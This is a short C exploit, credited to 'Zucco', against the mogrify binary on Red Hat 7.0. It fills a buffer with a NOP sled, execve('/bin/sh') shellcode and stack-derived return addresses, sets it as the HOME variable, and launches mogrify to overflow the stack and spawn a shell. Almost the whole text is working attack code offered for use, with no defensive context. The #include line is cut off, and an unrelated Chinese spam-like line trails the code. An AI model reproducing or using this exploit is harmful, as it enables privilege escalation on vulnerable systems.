/* /usr/X11R6/bin/mogrify (rh 7.0) exploit by Zucco (zucco@netposta.net) Thx to: lez, [Cr0W], akos, slash, scrippie, sirc/#coders, EFnet/#hwa-security */ #include #define OFFSET 0 #define LEN 1696 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main(int argc, char **argv) { char *buff, *ptr; long *addr_ptr, addr; int offset=OFFSET, bsize=LEN; int i; if (argc > 1) offset = atoi(argv[1]); if (!(buff = malloc(bsize))) { printf("Memory suxx..\n"); exit(0); } addr = get_sp() - offset; ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; setenv("HOME",buff,1); execlp("/usr/X11R6/bin/mogrify", "zzzzz",0); }

亚洲欧美在线